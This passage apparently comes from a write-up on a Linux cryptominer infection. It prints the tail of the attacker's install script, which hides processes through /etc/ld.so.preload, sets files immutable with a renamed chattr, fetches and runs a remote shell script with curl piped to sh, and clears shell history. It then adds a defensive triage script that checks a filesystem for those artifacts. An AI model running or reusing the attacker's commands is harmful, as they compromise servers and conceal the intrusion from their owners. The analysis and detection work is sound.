mkdir -p ${H2P} 2>/dev/null
echo $LHB_MAKE | base64 -d > ${H2P}/Makefile
echo $PROCHIDE | base64 -d > ${H2P}/processhider.c
sed -i 's/evil_script.py/'$BINARY_NAME'/g' ${H2P}/processhider.c
cd ${H2P}
make 2>/dev/null 1>/dev/null
${CHATTR} -ia / /etc/ /etc/ld.so.preload /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null 1>/dev/null
cp ${H2P}/libprocesshider.so /usr/local/lib/$BINARY_NAME.so 2>/dev/null
#rm -fr ${H2P} 2>/dev/null 1>/dev/null
${CHATTR} +i /usr/local/lib/$BINARY_NAME.so
if [ ! -f "/etc/ld.so.preload" ]; then touch /etc/ld.so.preload; fi
if [ -f /usr/local/lib/$BINARY_NAME.so ]; then cat /etc/ld.so.preload 2>/dev/null 1>/dev/null | grep '/usr/local/lib/'$BINARY_NAME'.so' || echo '/usr/local/lib/'$BINARY_NAME'.so' >> /etc/ld.so.preload;fi
${CHATTR} +i /etc/ld.so.preload
fi
}
exe_remo(){
if [ ! -f "/var/tmp/.psla" ]; then
localgo
echo 'lockfile' > /var/tmp/.psla
sleep 10
${CURL_CMD} -fsSL http://${domain}/s3f815/s/s.sh | sh
${CHATTR} +i /var/tmp/.alsp
history -c
else
echo "replay .. i know this server ..."
fi
echo "[*] Setup complete"
history -c
}
check_exist
m_command
ins_package
check_exist
SetupNameServers
download_f
setup_s
makesshaxx
clean_monitor
clean_cron
lock_cron
exec_hide
exec_hide2
clmo
exe_remo
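The script above explains the earlier detours: m_command renames chattr to zzhcht and wget/curl to wls/cls, which is where "chattr: command not found" came from, and the libprocesshider library that exec_hide2 builds from processhider.c and registers in /etc/ld.so.preload is what kept [cmake] out of top and htop. As an added example (not from the post or the script), the POSIX shell check below looks for exactly the artifacts those functions leave behind, taking a root prefix so it can run against a mounted disk image or, as here, a constructed test tree; the sample trees and the placeholder key are constructed, not taken from a real host.

```shell
#!/bin/sh
# Added example, not part of the original post or of the attacker's script.
# Host triage for the artifacts the script above leaves behind, taken from
# its own functions: m_command renames chattr/wget/curl to zzhcht/wls/cls
# (the real reason behind "chattr: command not found"), download_f and
# exec_hide2 drop files under /usr/share and /usr/local/lib, setup_s installs
# cmake.service, makesshaxx plants a root@puppetserver key, exec_hide2 hooks
# /etc/ld.so.preload, and exe_remo leaves the /var/tmp/.psla marker.
# $1 is a root prefix, so the check can run against a mounted disk image or a
# test tree instead of the live system (default: /).

triage_miner_artifacts() {
    root="${1:-/}"; root="${root%/}"
    # 1. Renamed system tools.
    for f in bin/zzhcht usr/bin/zzhcht bin/wls usr/bin/wls bin/cls usr/bin/cls; do
        [ -e "$root/$f" ] && echo "renamed-tool: $f"
    done
    # 2. ld.so.preload hook: any entry is suspicious on an ordinary server.
    if [ -s "$root/etc/ld.so.preload" ]; then
        grep -v '^[[:space:]]*$' "$root/etc/ld.so.preload" | while read -r lib; do
            echo "ld.so.preload: $lib"
        done
    fi
    # 3. Miner binary, its config, the hidden build directories and the marker.
    for f in 'usr/share/[cmake]' 'usr/share/[cmake].pid' usr/share/crypto usr/share/..hide \
             usr/share/..lph 'usr/local/lib/[cmake].so' var/tmp/.psla; do
        [ -e "$root/$f" ] && echo "dropped-file: $f"
    done
    # 4. Persistence: the systemd unit and the planted SSH key.
    [ -e "$root/etc/systemd/system/cmake.service" ] && echo "service: etc/systemd/system/cmake.service"
    for k in root/.ssh/authorized_keys root/.ssh/authorized_keys2; do
        [ -f "$root/$k" ] && grep -q 'root@puppetserver' "$root/$k" && echo "ssh-key: $k contains root@puppetserver"
    done
    # 5. Immutable/append-only bits set with chattr +ia (best effort: lsattr may
    # be missing, renamed, or unsupported on this filesystem).
    for f in etc/ld.so.preload etc/crontab var/spool/cron etc/cron.d root/.ssh/authorized_keys; do
        [ -e "$root/$f" ] && lsattr -d "$root/$f" 2>/dev/null | awk '{ print $1 }' | grep -q '[ia]' &&
            echo "immutable: $f (clear with chattr -ia before removing)"
    done
    return 0
}

# Number of findings; 0 means none of the script's artifacts were seen.
triage_count() { triage_miner_artifacts "$1" | awk 'END { print NR }'; }

# Constructed sample trees (not a real host), so the check runs offline.
CLEAN_ROOT=$(mktemp -d)
HIT_ROOT=$(mktemp -d)
mkdir -p "$CLEAN_ROOT/etc" "$CLEAN_ROOT/usr/share"
: > "$CLEAN_ROOT/etc/ld.so.preload"    # an empty preload file is normal
mkdir -p "$HIT_ROOT/bin" "$HIT_ROOT/etc/systemd/system" "$HIT_ROOT/usr/share/..lph" \
         "$HIT_ROOT/usr/local/lib" "$HIT_ROOT/root/.ssh" "$HIT_ROOT/var/tmp"
: > "$HIT_ROOT/bin/zzhcht"
echo '/usr/local/lib/[cmake].so' > "$HIT_ROOT/etc/ld.so.preload"
: > "$HIT_ROOT/usr/share/[cmake]"
: > "$HIT_ROOT/usr/share/[cmake].pid"
: > "$HIT_ROOT/usr/local/lib/[cmake].so"
: > "$HIT_ROOT/etc/systemd/system/cmake.service"
echo 'ssh-rsa AAAA-PLACEHOLDER-NOT-THE-REAL-KEY root@puppetserver' > "$HIT_ROOT/root/.ssh/authorized_keys"
: > "$HIT_ROOT/var/tmp/.psla"

triage_miner_artifacts "$HIT_ROOT"      # nine findings
triage_miner_artifacts "$CLEAN_ROOT"    # no output
```

Running it against a live box as `triage_miner_artifacts /` is read-only; it reports, and the removal itself still needs the chattr -ia step the post describes first.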
Corrections welcome; for other questions, see the comments.